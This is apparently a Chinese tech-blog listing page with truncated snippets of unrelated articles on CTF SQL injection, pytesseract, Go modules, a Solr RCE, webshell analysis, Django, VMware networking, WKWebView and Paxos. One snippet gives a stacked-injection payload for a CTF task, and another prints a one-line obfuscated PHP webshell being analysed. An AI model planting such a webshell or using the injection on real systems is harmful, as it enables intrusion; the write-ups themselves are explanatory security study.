0x01 EasySQL 这是一个考察堆叠注入的题目,但是这道题因为作者的过滤不够完全所以存在非预期解 非预期解 直接构造 *,1 这样构造,最后拼接的查询语句就变成了 select *,1||flag from Flag,可以直接得到当前表中的全部内容,就能够直接获得flag 正常解题 堆叠注入, ...
分类:
Web程序 时间:
2019-11-02 10:05:15
阅读次数:
90
使用pytesseract识别验证码中遇到异常如下: 安装Pillow,命令pip install Pillow,安装完毕会在Python文件夹下Lib\site-packages\pytesseract这个文件夹,里面有pytesseract.py文件 检查上述报错中的pytesseract.py ...
分类:
其他好文 时间:
2019-11-01 22:48:09
阅读次数:
95
由于谷歌被墙,跟谷歌相关的模块无法通过go get来下载 解决方法: 如果是Windows下,最后一条可以替换为mklink命令,或者直接拷贝文件夹修改一下名称即可。 go的官方包都在这个目录下: https://github.com/golang 原文地址:https://studygolang. ...
分类:
其他好文 时间:
2019-11-01 20:23:24
阅读次数:
80
多事之秋,刚爆出来shiro的RCE,紧接着solr服务器就出了RCE 自从漏洞爆出来已经一段时间,复现漏洞多如牛毛,我这里来水一篇 漏洞简介 什么是solr服务器? Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服 ...
分类:
Web程序 时间:
2019-11-01 18:11:06
阅读次数:
107
WebShell代码分析溯源(五) 一、一句话变形马样本 <?php $e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e)); ?> 二、代码分析 1、调整代码格式 2、分析代码 首先使用R ...
分类:
Web程序 时间:
2019-11-01 13:12:58
阅读次数:
107
django之auth模块 自定义中间件的配置 代码链接 "自定义中间件" ...
分类:
编程语言 时间:
2019-11-01 00:01:07
阅读次数:
260
刚刚因为虚拟机与主机没法互相ping通的事情,奋战到将近凌晨一点。现在把这个过程总结一下,以方便后加入该行业的广大IT精英。 VMWare提供了三种工作模式:bridged(桥接模式)、NAT(网络地址转换模式)和host-only(主机模式)。1. bridged(桥接模式) 在这种模式下,VMW ...
一、WKWebView WKWebView 初始化时,有一个参数叫configuration,它是WKWebViewConfiguration类型的参数,而WKWebViewConfiguration有一个属性叫userContentController,它又是WKUserContentContro ...
分类:
移动开发 时间:
2019-10-31 10:48:47
阅读次数:
132
Paxos作用:取值一致性 Paxos应用:分布式多副本的更新操作序列[opration1,opration2,opration3]需要相同,用Paxos确定操作序列。Google的Chubby、Megastore和Spanner都采用了Paxos来对数据副本的更新序列达成一致。 Paxos组成:系 ...
分类:
编程语言 时间:
2019-10-31 00:24:03
阅读次数:
109
